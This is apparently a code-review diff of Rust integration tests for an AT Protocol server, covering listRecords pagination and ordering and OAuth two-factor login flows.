"{}/xrpc/com.atproto.repo.putRecord",
32
+
base_url().await
33
+
))
34
+
.bearer_auth(jwt)
35
+
.json(&payload)
36
+
.send()
37
+
.await
38
+
.expect("Failed to create record");
39
+
40
+
assert_eq!(res.status(), StatusCode::OK);
41
+
let body: Value = res.json().await.unwrap();
42
+
(
43
+
body["uri"].as_str().unwrap().to_string(),
44
+
body["cid"].as_str().unwrap().to_string(),
45
+
)
46
+
}
47
+
48
+
#[tokio::test]
49
+
async fn test_list_records_default_order() {
50
+
let client = client();
51
+
let (did, jwt) = setup_new_user("list-default-order").await;
52
+
53
+
create_post_with_rkey(&client, &did, &jwt, "aaaa", "First post").await;
54
+
tokio::time::sleep(Duration::from_millis(50)).await;
55
+
create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second post").await;
56
+
tokio::time::sleep(Duration::from_millis(50)).await;
57
+
create_post_with_rkey(&client, &did, &jwt, "cccc", "Third post").await;
58
+
59
+
let res = client
60
+
.get(format!(
61
+
"{}/xrpc/com.atproto.repo.listRecords",
62
+
base_url().await
63
+
))
64
+
.query(&[
65
+
("repo", did.as_str()),
66
+
("collection", "app.bsky.feed.post"),
67
+
])
68
+
.send()
69
+
.await
70
+
.expect("Failed to list records");
71
+
72
+
assert_eq!(res.status(), StatusCode::OK);
73
+
let body: Value = res.json().await.unwrap();
74
+
let records = body["records"].as_array().unwrap();
75
+
76
+
assert_eq!(records.len(), 3);
77
+
let rkeys: Vec<&str> = records
78
+
.iter()
79
+
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
80
+
.collect();
81
+
82
+
assert_eq!(rkeys, vec!["cccc", "bbbb", "aaaa"], "Default order should be DESC (newest first)");
83
+
}
84
+
85
+
#[tokio::test]
86
+
async fn test_list_records_reverse_true() {
87
+
let client = client();
88
+
let (did, jwt) = setup_new_user("list-reverse").await;
89
+
90
+
create_post_with_rkey(&client, &did, &jwt, "aaaa", "First post").await;
91
+
tokio::time::sleep(Duration::from_millis(50)).await;
92
+
create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second post").await;
93
+
tokio::time::sleep(Duration::from_millis(50)).await;
94
+
create_post_with_rkey(&client, &did, &jwt, "cccc", "Third post").await;
95
+
96
+
let res = client
97
+
.get(format!(
98
+
"{}/xrpc/com.atproto.repo.listRecords",
99
+
base_url().await
100
+
))
101
+
.query(&[
102
+
("repo", did.as_str()),
103
+
("collection", "app.bsky.feed.post"),
104
+
("reverse", "true"),
105
+
])
106
+
.send()
107
+
.await
108
+
.expect("Failed to list records");
109
+
110
+
assert_eq!(res.status(), StatusCode::OK);
111
+
let body: Value = res.json().await.unwrap();
112
+
let records = body["records"].as_array().unwrap();
113
+
114
+
let rkeys: Vec<&str> = records
115
+
.iter()
116
+
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
117
+
.collect();
118
+
119
+
assert_eq!(rkeys, vec!["aaaa", "bbbb", "cccc"], "reverse=true should give ASC order (oldest first)");
120
+
}
121
+
122
+
#[tokio::test]
123
+
async fn test_list_records_cursor_pagination() {
124
+
let client = client();
125
+
let (did, jwt) = setup_new_user("list-cursor").await;
126
+
127
+
for i in 0..5 {
128
+
create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
129
+
tokio::time::sleep(Duration::from_millis(50)).await;
130
+
}
131
+
132
+
let res = client
133
+
.get(format!(
134
+
"{}/xrpc/com.atproto.repo.listRecords",
135
+
base_url().await
136
+
))
137
+
.query(&[
138
+
("repo", did.as_str()),
139
+
("collection", "app.bsky.feed.post"),
140
+
("limit", "2"),
141
+
])
142
+
.send()
143
+
.await
144
+
.expect("Failed to list records");
145
+
146
+
assert_eq!(res.status(), StatusCode::OK);
147
+
let body: Value = res.json().await.unwrap();
148
+
let records = body["records"].as_array().unwrap();
149
+
assert_eq!(records.len(), 2);
150
+
151
+
let cursor = body["cursor"].as_str().expect("Should have cursor with more records");
152
+
153
+
let res2 = client
154
+
.get(format!(
155
+
"{}/xrpc/com.atproto.repo.listRecords",
156
+
base_url().await
157
+
))
158
+
.query(&[
159
+
("repo", did.as_str()),
160
+
("collection", "app.bsky.feed.post"),
161
+
("limit", "2"),
162
+
("cursor", cursor),
163
+
])
164
+
.send()
165
+
.await
166
+
.expect("Failed to list records with cursor");
167
+
168
+
assert_eq!(res2.status(), StatusCode::OK);
169
+
let body2: Value = res2.json().await.unwrap();
170
+
let records2 = body2["records"].as_array().unwrap();
171
+
assert_eq!(records2.len(), 2);
172
+
173
+
let all_uris: Vec<&str> = records
174
+
.iter()
175
+
.chain(records2.iter())
176
+
.map(|r| r["uri"].as_str().unwrap())
177
+
.collect();
178
+
let unique_uris: std::collections::HashSet<&str> = all_uris.iter().copied().collect();
179
+
assert_eq!(all_uris.len(), unique_uris.len(), "Cursor pagination should not repeat records");
180
+
}
181
+
182
+
#[tokio::test]
183
+
async fn test_list_records_rkey_start() {
184
+
let client = client();
185
+
let (did, jwt) = setup_new_user("list-rkey-start").await;
186
+
187
+
create_post_with_rkey(&client, &did, &jwt, "aaaa", "First").await;
188
+
create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second").await;
189
+
create_post_with_rkey(&client, &did, &jwt, "cccc", "Third").await;
190
+
create_post_with_rkey(&client, &did, &jwt, "dddd", "Fourth").await;
191
+
192
+
let res = client
193
+
.get(format!(
194
+
"{}/xrpc/com.atproto.repo.listRecords",
195
+
base_url().await
196
+
))
197
+
.query(&[
198
+
("repo", did.as_str()),
199
+
("collection", "app.bsky.feed.post"),
200
+
("rkeyStart", "bbbb"),
201
+
("reverse", "true"),
202
+
])
203
+
.send()
204
+
.await
205
+
.expect("Failed to list records");
206
+
207
+
assert_eq!(res.status(), StatusCode::OK);
208
+
let body: Value = res.json().await.unwrap();
209
+
let records = body["records"].as_array().unwrap();
210
+
211
+
let rkeys: Vec<&str> = records
212
+
.iter()
213
+
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
214
+
.collect();
215
+
216
+
for rkey in &rkeys {
217
+
assert!(*rkey >= "bbbb", "rkeyStart should filter records >= start");
218
+
}
219
+
}
220
+
221
+
#[tokio::test]
222
+
async fn test_list_records_rkey_end() {
223
+
let client = client();
224
+
let (did, jwt) = setup_new_user("list-rkey-end").await;
225
+
226
+
create_post_with_rkey(&client, &did, &jwt, "aaaa", "First").await;
227
+
create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second").await;
228
+
create_post_with_rkey(&client, &did, &jwt, "cccc", "Third").await;
229
+
create_post_with_rkey(&client, &did, &jwt, "dddd", "Fourth").await;
230
+
231
+
let res = client
232
+
.get(format!(
233
+
"{}/xrpc/com.atproto.repo.listRecords",
234
+
base_url().await
235
+
))
236
+
.query(&[
237
+
("repo", did.as_str()),
238
+
("collection", "app.bsky.feed.post"),
239
+
("rkeyEnd", "cccc"),
240
+
("reverse", "true"),
241
+
])
242
+
.send()
243
+
.await
244
+
.expect("Failed to list records");
245
+
246
+
assert_eq!(res.status(), StatusCode::OK);
247
+
let body: Value = res.json().await.unwrap();
248
+
let records = body["records"].as_array().unwrap();
249
+
250
+
let rkeys: Vec<&str> = records
251
+
.iter()
252
+
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
253
+
.collect();
254
+
255
+
for rkey in &rkeys {
256
+
assert!(*rkey <= "cccc", "rkeyEnd should filter records <= end");
257
+
}
258
+
}
259
+
260
+
#[tokio::test]
261
+
async fn test_list_records_rkey_range() {
262
+
let client = client();
263
+
let (did, jwt) = setup_new_user("list-rkey-range").await;
264
+
265
+
create_post_with_rkey(&client, &did, &jwt, "aaaa", "First").await;
266
+
create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second").await;
267
+
create_post_with_rkey(&client, &did, &jwt, "cccc", "Third").await;
268
+
create_post_with_rkey(&client, &did, &jwt, "dddd", "Fourth").await;
269
+
create_post_with_rkey(&client, &did, &jwt, "eeee", "Fifth").await;
270
+
271
+
let res = client
272
+
.get(format!(
273
+
"{}/xrpc/com.atproto.repo.listRecords",
274
+
base_url().await
275
+
))
276
+
.query(&[
277
+
("repo", did.as_str()),
278
+
("collection", "app.bsky.feed.post"),
279
+
("rkeyStart", "bbbb"),
280
+
("rkeyEnd", "dddd"),
281
+
("reverse", "true"),
282
+
])
283
+
.send()
284
+
.await
285
+
.expect("Failed to list records");
286
+
287
+
assert_eq!(res.status(), StatusCode::OK);
288
+
let body: Value = res.json().await.unwrap();
289
+
let records = body["records"].as_array().unwrap();
290
+
291
+
let rkeys: Vec<&str> = records
292
+
.iter()
293
+
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
294
+
.collect();
295
+
296
+
for rkey in &rkeys {
297
+
assert!(*rkey >= "bbbb" && *rkey <= "dddd", "Range should be inclusive, got {}", rkey);
298
+
}
299
+
assert!(!rkeys.is_empty(), "Should have at least some records in range");
300
+
}
301
+
302
+
#[tokio::test]
303
+
async fn test_list_records_limit_clamping_max() {
304
+
let client = client();
305
+
let (did, jwt) = setup_new_user("list-limit-max").await;
306
+
307
+
for i in 0..5 {
308
+
create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
309
+
}
310
+
311
+
let res = client
312
+
.get(format!(
313
+
"{}/xrpc/com.atproto.repo.listRecords",
314
+
base_url().await
315
+
))
316
+
.query(&[
317
+
("repo", did.as_str()),
318
+
("collection", "app.bsky.feed.post"),
319
+
("limit", "1000"),
320
+
])
321
+
.send()
322
+
.await
323
+
.expect("Failed to list records");
324
+
325
+
assert_eq!(res.status(), StatusCode::OK);
326
+
let body: Value = res.json().await.unwrap();
327
+
let records = body["records"].as_array().unwrap();
328
+
assert!(records.len() <= 100, "Limit should be clamped to max 100");
329
+
}
330
+
331
+
#[tokio::test]
332
+
async fn test_list_records_limit_clamping_min() {
333
+
let client = client();
334
+
let (did, jwt) = setup_new_user("list-limit-min").await;
335
+
336
+
create_post_with_rkey(&client, &did, &jwt, "aaaa", "Post").await;
337
+
338
+
let res = client
339
+
.get(format!(
340
+
"{}/xrpc/com.atproto.repo.listRecords",
341
+
base_url().await
342
+
))
343
+
.query(&[
344
+
("repo", did.as_str()),
345
+
("collection", "app.bsky.feed.post"),
346
+
("limit", "0"),
347
+
])
348
+
.send()
349
+
.await
350
+
.expect("Failed to list records");
351
+
352
+
assert_eq!(res.status(), StatusCode::OK);
353
+
let body: Value = res.json().await.unwrap();
354
+
let records = body["records"].as_array().unwrap();
355
+
assert!(records.len() >= 1, "Limit should be clamped to min 1");
356
+
}
357
+
358
+
#[tokio::test]
359
+
async fn test_list_records_empty_collection() {
360
+
let client = client();
361
+
let (did, _jwt) = setup_new_user("list-empty").await;
362
+
363
+
let res = client
364
+
.get(format!(
365
+
"{}/xrpc/com.atproto.repo.listRecords",
366
+
base_url().await
367
+
))
368
+
.query(&[
369
+
("repo", did.as_str()),
370
+
("collection", "app.bsky.feed.post"),
371
+
])
372
+
.send()
373
+
.await
374
+
.expect("Failed to list records");
375
+
376
+
assert_eq!(res.status(), StatusCode::OK);
377
+
let body: Value = res.json().await.unwrap();
378
+
let records = body["records"].as_array().unwrap();
379
+
assert!(records.is_empty(), "Empty collection should return empty array");
380
+
assert!(body["cursor"].is_null(), "Empty collection should have no cursor");
381
+
}
382
+
383
+
#[tokio::test]
384
+
async fn test_list_records_exact_limit() {
385
+
let client = client();
386
+
let (did, jwt) = setup_new_user("list-exact-limit").await;
387
+
388
+
for i in 0..10 {
389
+
create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
390
+
}
391
+
392
+
let res = client
393
+
.get(format!(
394
+
"{}/xrpc/com.atproto.repo.listRecords",
395
+
base_url().await
396
+
))
397
+
.query(&[
398
+
("repo", did.as_str()),
399
+
("collection", "app.bsky.feed.post"),
400
+
("limit", "5"),
401
+
])
402
+
.send()
403
+
.await
404
+
.expect("Failed to list records");
405
+
406
+
assert_eq!(res.status(), StatusCode::OK);
407
+
let body: Value = res.json().await.unwrap();
408
+
let records = body["records"].as_array().unwrap();
409
+
assert_eq!(records.len(), 5, "Should return exactly 5 records when limit=5");
410
+
}
411
+
412
+
#[tokio::test]
413
+
async fn test_list_records_cursor_exhaustion() {
414
+
let client = client();
415
+
let (did, jwt) = setup_new_user("list-cursor-exhaust").await;
416
+
417
+
for i in 0..3 {
418
+
create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
419
+
}
420
+
421
+
let res = client
422
+
.get(format!(
423
+
"{}/xrpc/com.atproto.repo.listRecords",
424
+
base_url().await
425
+
))
426
+
.query(&[
427
+
("repo", did.as_str()),
428
+
("collection", "app.bsky.feed.post"),
429
+
("limit", "10"),
430
+
])
431
+
.send()
432
+
.await
433
+
.expect("Failed to list records");
434
+
435
+
assert_eq!(res.status(), StatusCode::OK);
436
+
let body: Value = res.json().await.unwrap();
437
+
let records = body["records"].as_array().unwrap();
438
+
assert_eq!(records.len(), 3);
439
+
}
440
+
441
+
#[tokio::test]
442
+
async fn test_list_records_repo_not_found() {
443
+
let client = client();
444
+
445
+
let res = client
446
+
.get(format!(
447
+
"{}/xrpc/com.atproto.repo.listRecords",
448
+
base_url().await
449
+
))
450
+
.query(&[
451
+
("repo", "did:plc:nonexistent12345"),
452
+
("collection", "app.bsky.feed.post"),
453
+
])
454
+
.send()
455
+
.await
456
+
.expect("Failed to list records");
457
+
458
+
assert_eq!(res.status(), StatusCode::NOT_FOUND);
459
+
}
460
+
461
+
#[tokio::test]
462
+
async fn test_list_records_includes_cid() {
463
+
let client = client();
464
+
let (did, jwt) = setup_new_user("list-includes-cid").await;
465
+
466
+
create_post_with_rkey(&client, &did, &jwt, "test", "Test post").await;
467
+
468
+
let res = client
469
+
.get(format!(
470
+
"{}/xrpc/com.atproto.repo.listRecords",
471
+
base_url().await
472
+
))
473
+
.query(&[
474
+
("repo", did.as_str()),
475
+
("collection", "app.bsky.feed.post"),
476
+
])
477
+
.send()
478
+
.await
479
+
.expect("Failed to list records");
480
+
481
+
assert_eq!(res.status(), StatusCode::OK);
482
+
let body: Value = res.json().await.unwrap();
483
+
let records = body["records"].as_array().unwrap();
484
+
485
+
for record in records {
486
+
assert!(record["uri"].is_string(), "Record should have uri");
487
+
assert!(record["cid"].is_string(), "Record should have cid");
488
+
assert!(record["value"].is_object(), "Record should have value");
489
+
let cid = record["cid"].as_str().unwrap();
490
+
assert!(cid.starts_with("bafy"), "CID should be a base32-encoded CIDv1 (bafy...)");
491
+
}
492
+
}
493
+
494
+
#[tokio::test]
495
+
async fn test_list_records_cursor_with_reverse() {
496
+
let client = client();
497
+
let (did, jwt) = setup_new_user("list-cursor-reverse").await;
498
+
499
+
for i in 0..5 {
500
+
create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
501
+
}
502
+
503
+
let res = client
504
+
.get(format!(
505
+
"{}/xrpc/com.atproto.repo.listRecords",
506
+
base_url().await
507
+
))
508
+
.query(&[
509
+
("repo", did.as_str()),
510
+
("collection", "app.bsky.feed.post"),
511
+
("limit", "2"),
512
+
("reverse", "true"),
513
+
])
514
+
.send()
515
+
.await
516
+
.expect("Failed to list records");
517
+
518
+
assert_eq!(res.status(), StatusCode::OK);
519
+
let body: Value = res.json().await.unwrap();
520
+
let records = body["records"].as_array().unwrap();
521
+
let first_rkeys: Vec<&str> = records
522
+
.iter()
523
+
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
524
+
.collect();
525
+
526
+
assert_eq!(first_rkeys, vec!["post00", "post01"], "First page with reverse should start from oldest");
527
+
528
+
if let Some(cursor) = body["cursor"].as_str() {
529
+
let res2 = client
530
+
.get(format!(
531
+
"{}/xrpc/com.atproto.repo.listRecords",
532
+
base_url().await
533
+
))
534
+
.query(&[
535
+
("repo", did.as_str()),
536
+
("collection", "app.bsky.feed.post"),
537
+
("limit", "2"),
538
+
("reverse", "true"),
539
+
("cursor", cursor),
540
+
])
541
+
.send()
542
+
.await
543
+
.expect("Failed to list records with cursor");
544
+
545
+
let body2: Value = res2.json().await.unwrap();
546
+
let records2 = body2["records"].as_array().unwrap();
547
+
let second_rkeys: Vec<&str> = records2
548
+
.iter()
549
+
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
550
+
.collect();
551
+
552
+
assert_eq!(second_rkeys, vec!["post02", "post03"], "Second page should continue in ASC order");
553
+
}
554
+
}
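For reference, the listRecords tests above all go through a create_post_with_rkey helper that is defined elsewhere in this test module. A minimal sketch of what such a helper might look like, assuming the com.atproto.repo.createRecord endpoint and the base_url()/JWT conventions already used above (the name and error handling here are illustrative, not the suite's actual helper):

// Hypothetical sketch; the real helper lives elsewhere in the test suite.
async fn create_post_with_rkey_sketch(
    client: &reqwest::Client,
    did: &str,
    jwt: &str,
    rkey: &str,
    text: &str,
) {
    let res = client
        .post(format!("{}/xrpc/com.atproto.repo.createRecord", base_url().await))
        .header("Authorization", format!("Bearer {}", jwt))
        .json(&serde_json::json!({
            "repo": did,
            "collection": "app.bsky.feed.post",
            "rkey": rkey, // explicit rkey so the tests control lexical ordering
            "record": {
                "$type": "app.bsky.feed.post",
                "text": text,
                "createdAt": chrono::Utc::now().to_rfc3339()
            }
        }))
        .send()
        .await
        .expect("Failed to create record");
    assert!(res.status().is_success(), "createRecord should succeed for rkey {}", rkey);
}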
+633 tests/oauth.rs
···
323
324
let auth_res = client
325
.get(format!("{}/oauth/authorize", url))
326
.query(&[("request_uri", request_uri)])
327
.send()
328
.await
···
344
345
let res = client
346
.get(format!("{}/oauth/authorize", url))
347
.query(&[("request_uri", "urn:ietf:params:oauth:request_uri:nonexistent")])
348
.send()
349
.await
···
941
942
let auth_res = http_client
943
.post(format!("{}/oauth/authorize", url))
944
.form(&[
945
("request_uri", request_uri),
946
("username", &handle),
···
1162
1163
let auth_res = http_client
1164
.post(format!("{}/oauth/authorize", url))
1165
.form(&[
1166
("request_uri", request_uri),
1167
("username", &handle),
···
1184
1185
let res = http_client
1186
.get(format!("{}/oauth/authorize", url))
1187
.query(&[("request_uri", "urn:ietf:params:oauth:request_uri:expired-or-nonexistent")])
1188
.send()
1189
.await
···
1477
location
1478
);
1479
}
···
323
324
let auth_res = client
325
.get(format!("{}/oauth/authorize", url))
326
+
.header("Accept", "application/json")
327
.query(&[("request_uri", request_uri)])
328
.send()
329
.await
···
345
346
let res = client
347
.get(format!("{}/oauth/authorize", url))
348
+
.header("Accept", "application/json")
349
.query(&[("request_uri", "urn:ietf:params:oauth:request_uri:nonexistent")])
350
.send()
351
.await
···
943
944
let auth_res = http_client
945
.post(format!("{}/oauth/authorize", url))
946
+
.header("Accept", "application/json")
947
.form(&[
948
("request_uri", request_uri),
949
("username", &handle),
···
1165
1166
let auth_res = http_client
1167
.post(format!("{}/oauth/authorize", url))
1168
+
.header("Accept", "application/json")
1169
.form(&[
1170
("request_uri", request_uri),
1171
("username", &handle),
···
1188
1189
let res = http_client
1190
.get(format!("{}/oauth/authorize", url))
1191
+
.header("Accept", "application/json")
1192
.query(&[("request_uri", "urn:ietf:params:oauth:request_uri:expired-or-nonexistent")])
1193
.send()
1194
.await
···
1482
location
1483
);
1484
}
1485
+
1486
+
#[tokio::test]
1487
+
async fn test_2fa_required_when_enabled() {
1488
+
let url = base_url().await;
1489
+
let http_client = client();
1490
+
1491
+
let ts = Utc::now().timestamp_millis();
1492
+
let handle = format!("2fa-required-{}", ts);
1493
+
let email = format!("2fa-required-{}@example.com", ts);
1494
+
let password = "2fa-test-password";
1495
+
1496
+
let create_res = http_client
1497
+
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
1498
+
.json(&json!({
1499
+
"handle": handle,
1500
+
"email": email,
1501
+
"password": password
1502
+
}))
1503
+
.send()
1504
+
.await
1505
+
.unwrap();
1506
+
assert_eq!(create_res.status(), StatusCode::OK);
1507
+
let account: Value = create_res.json().await.unwrap();
1508
+
let user_did = account["did"].as_str().unwrap();
1509
+
1510
+
let db_url = common::get_db_connection_string().await;
1511
+
let pool = sqlx::postgres::PgPoolOptions::new()
1512
+
.max_connections(1)
1513
+
.connect(&db_url)
1514
+
.await
1515
+
.expect("Failed to connect to database");
1516
+
1517
+
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
1518
+
.bind(user_did)
1519
+
.execute(&pool)
1520
+
.await
1521
+
.expect("Failed to enable 2FA");
1522
+
1523
+
let redirect_uri = "https://example.com/2fa-callback";
1524
+
let mock_client = setup_mock_client_metadata(redirect_uri).await;
1525
+
let client_id = mock_client.uri();
1526
+
1527
+
let (_, code_challenge) = generate_pkce();
1528
+
1529
+
let par_body: Value = http_client
1530
+
.post(format!("{}/oauth/par", url))
1531
+
.form(&[
1532
+
("response_type", "code"),
1533
+
("client_id", &client_id),
1534
+
("redirect_uri", redirect_uri),
1535
+
("code_challenge", &code_challenge),
1536
+
("code_challenge_method", "S256"),
1537
+
])
1538
+
.send()
1539
+
.await
1540
+
.unwrap()
1541
+
.json()
1542
+
.await
1543
+
.unwrap();
1544
+
1545
+
let request_uri = par_body["request_uri"].as_str().unwrap();
1546
+
1547
+
let auth_client = no_redirect_client();
1548
+
let auth_res = auth_client
1549
+
.post(format!("{}/oauth/authorize", url))
1550
+
.form(&[
1551
+
("request_uri", request_uri),
1552
+
("username", &handle),
1553
+
("password", password),
1554
+
("remember_device", "false"),
1555
+
])
1556
+
.send()
1557
+
.await
1558
+
.unwrap();
1559
+
1560
+
assert!(
1561
+
auth_res.status().is_redirection(),
1562
+
"Should redirect to 2FA page, got status: {}",
1563
+
auth_res.status()
1564
+
);
1565
+
1566
+
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
1567
+
assert!(
1568
+
location.contains("/oauth/authorize/2fa"),
1569
+
"Should redirect to 2FA page, got: {}",
1570
+
location
1571
+
);
1572
+
assert!(
1573
+
location.contains("request_uri="),
1574
+
"2FA redirect should include request_uri"
1575
+
);
1576
+
}
1577
+
1578
+
#[tokio::test]
1579
+
async fn test_2fa_invalid_code_rejected() {
1580
+
let url = base_url().await;
1581
+
let http_client = client();
1582
+
1583
+
let ts = Utc::now().timestamp_millis();
1584
+
let handle = format!("2fa-invalid-{}", ts);
1585
+
let email = format!("2fa-invalid-{}@example.com", ts);
1586
+
let password = "2fa-test-password";
1587
+
1588
+
let create_res = http_client
1589
+
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
1590
+
.json(&json!({
1591
+
"handle": handle,
1592
+
"email": email,
1593
+
"password": password
1594
+
}))
1595
+
.send()
1596
+
.await
1597
+
.unwrap();
1598
+
assert_eq!(create_res.status(), StatusCode::OK);
1599
+
let account: Value = create_res.json().await.unwrap();
1600
+
let user_did = account["did"].as_str().unwrap();
1601
+
1602
+
let db_url = common::get_db_connection_string().await;
1603
+
let pool = sqlx::postgres::PgPoolOptions::new()
1604
+
.max_connections(1)
1605
+
.connect(&db_url)
1606
+
.await
1607
+
.expect("Failed to connect to database");
1608
+
1609
+
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
1610
+
.bind(user_did)
1611
+
.execute(&pool)
1612
+
.await
1613
+
.expect("Failed to enable 2FA");
1614
+
1615
+
let redirect_uri = "https://example.com/2fa-invalid-callback";
1616
+
let mock_client = setup_mock_client_metadata(redirect_uri).await;
1617
+
let client_id = mock_client.uri();
1618
+
1619
+
let (_, code_challenge) = generate_pkce();
1620
+
1621
+
let par_body: Value = http_client
1622
+
.post(format!("{}/oauth/par", url))
1623
+
.form(&[
1624
+
("response_type", "code"),
1625
+
("client_id", &client_id),
1626
+
("redirect_uri", redirect_uri),
1627
+
("code_challenge", &code_challenge),
1628
+
("code_challenge_method", "S256"),
1629
+
])
1630
+
.send()
1631
+
.await
1632
+
.unwrap()
1633
+
.json()
1634
+
.await
1635
+
.unwrap();
1636
+
1637
+
let request_uri = par_body["request_uri"].as_str().unwrap();
1638
+
1639
+
let auth_client = no_redirect_client();
1640
+
let auth_res = auth_client
1641
+
.post(format!("{}/oauth/authorize", url))
1642
+
.form(&[
1643
+
("request_uri", request_uri),
1644
+
("username", &handle),
1645
+
("password", password),
1646
+
("remember_device", "false"),
1647
+
])
1648
+
.send()
1649
+
.await
1650
+
.unwrap();
1651
+
1652
+
assert!(auth_res.status().is_redirection());
1653
+
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
1654
+
assert!(location.contains("/oauth/authorize/2fa"));
1655
+
1656
+
let twofa_res = http_client
1657
+
.post(format!("{}/oauth/authorize/2fa", url))
1658
+
.form(&[
1659
+
("request_uri", request_uri),
1660
+
("code", "000000"),
1661
+
])
1662
+
.send()
1663
+
.await
1664
+
.unwrap();
1665
+
1666
+
assert_eq!(twofa_res.status(), StatusCode::OK);
1667
+
let body = twofa_res.text().await.unwrap();
1668
+
assert!(
1669
+
body.contains("Invalid verification code") || body.contains("invalid"),
1670
+
"Should show error for invalid code"
1671
+
);
1672
+
}
1673
+
1674
+
#[tokio::test]
1675
+
async fn test_2fa_valid_code_completes_auth() {
1676
+
let url = base_url().await;
1677
+
let http_client = client();
1678
+
1679
+
let ts = Utc::now().timestamp_millis();
1680
+
let handle = format!("2fa-valid-{}", ts);
1681
+
let email = format!("2fa-valid-{}@example.com", ts);
1682
+
let password = "2fa-test-password";
1683
+
1684
+
let create_res = http_client
1685
+
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
1686
+
.json(&json!({
1687
+
"handle": handle,
1688
+
"email": email,
1689
+
"password": password
1690
+
}))
1691
+
.send()
1692
+
.await
1693
+
.unwrap();
1694
+
assert_eq!(create_res.status(), StatusCode::OK);
1695
+
let account: Value = create_res.json().await.unwrap();
1696
+
let user_did = account["did"].as_str().unwrap();
1697
+
1698
+
let db_url = common::get_db_connection_string().await;
1699
+
let pool = sqlx::postgres::PgPoolOptions::new()
1700
+
.max_connections(1)
1701
+
.connect(&db_url)
1702
+
.await
1703
+
.expect("Failed to connect to database");
1704
+
1705
+
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
1706
+
.bind(user_did)
1707
+
.execute(&pool)
1708
+
.await
1709
+
.expect("Failed to enable 2FA");
1710
+
1711
+
let redirect_uri = "https://example.com/2fa-valid-callback";
1712
+
let mock_client = setup_mock_client_metadata(redirect_uri).await;
1713
+
let client_id = mock_client.uri();
1714
+
1715
+
let (code_verifier, code_challenge) = generate_pkce();
1716
+
1717
+
let par_body: Value = http_client
1718
+
.post(format!("{}/oauth/par", url))
1719
+
.form(&[
1720
+
("response_type", "code"),
1721
+
("client_id", &client_id),
1722
+
("redirect_uri", redirect_uri),
1723
+
("code_challenge", &code_challenge),
1724
+
("code_challenge_method", "S256"),
1725
+
])
1726
+
.send()
1727
+
.await
1728
+
.unwrap()
1729
+
.json()
1730
+
.await
1731
+
.unwrap();
1732
+
1733
+
let request_uri = par_body["request_uri"].as_str().unwrap();
1734
+
1735
+
let auth_client = no_redirect_client();
1736
+
let auth_res = auth_client
1737
+
.post(format!("{}/oauth/authorize", url))
1738
+
.form(&[
1739
+
("request_uri", request_uri),
1740
+
("username", &handle),
1741
+
("password", password),
1742
+
("remember_device", "false"),
1743
+
])
1744
+
.send()
1745
+
.await
1746
+
.unwrap();
1747
+
1748
+
assert!(auth_res.status().is_redirection());
1749
+
1750
+
let twofa_code: String = sqlx::query_scalar(
1751
+
"SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1"
1752
+
)
1753
+
.bind(request_uri)
1754
+
.fetch_one(&pool)
1755
+
.await
1756
+
.expect("Failed to get 2FA code from database");
1757
+
1758
+
let twofa_res = auth_client
1759
+
.post(format!("{}/oauth/authorize/2fa", url))
1760
+
.form(&[
1761
+
("request_uri", request_uri),
1762
+
("code", &twofa_code),
1763
+
])
1764
+
.send()
1765
+
.await
1766
+
.unwrap();
1767
+
1768
+
assert!(
1769
+
twofa_res.status().is_redirection(),
1770
+
"Valid 2FA code should redirect to success, got status: {}",
1771
+
twofa_res.status()
1772
+
);
1773
+
1774
+
let location = twofa_res.headers().get("location").unwrap().to_str().unwrap();
1775
+
assert!(
1776
+
location.starts_with(redirect_uri),
1777
+
"Should redirect to client callback, got: {}",
1778
+
location
1779
+
);
1780
+
assert!(
1781
+
location.contains("code="),
1782
+
"Redirect should include authorization code"
1783
+
);
1784
+
1785
+
let auth_code = location.split("code=").nth(1).unwrap().split('&').next().unwrap();
1786
+
1787
+
let token_res = http_client
1788
+
.post(format!("{}/oauth/token", url))
1789
+
.form(&[
1790
+
("grant_type", "authorization_code"),
1791
+
("code", auth_code),
1792
+
("redirect_uri", redirect_uri),
1793
+
("code_verifier", &code_verifier),
1794
+
("client_id", &client_id),
1795
+
])
1796
+
.send()
1797
+
.await
1798
+
.unwrap();
1799
+
1800
+
assert_eq!(token_res.status(), StatusCode::OK, "Token exchange should succeed");
1801
+
let token_body: Value = token_res.json().await.unwrap();
1802
+
assert!(token_body["access_token"].is_string());
1803
+
assert_eq!(token_body["sub"], user_did);
1804
+
}
1805
+
1806
+
#[tokio::test]
1807
+
async fn test_2fa_lockout_after_max_attempts() {
1808
+
let url = base_url().await;
1809
+
let http_client = client();
1810
+
1811
+
let ts = Utc::now().timestamp_millis();
1812
+
let handle = format!("2fa-lockout-{}", ts);
1813
+
let email = format!("2fa-lockout-{}@example.com", ts);
1814
+
let password = "2fa-test-password";
1815
+
1816
+
let create_res = http_client
1817
+
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
1818
+
.json(&json!({
1819
+
"handle": handle,
1820
+
"email": email,
1821
+
"password": password
1822
+
}))
1823
+
.send()
1824
+
.await
1825
+
.unwrap();
1826
+
assert_eq!(create_res.status(), StatusCode::OK);
1827
+
let account: Value = create_res.json().await.unwrap();
1828
+
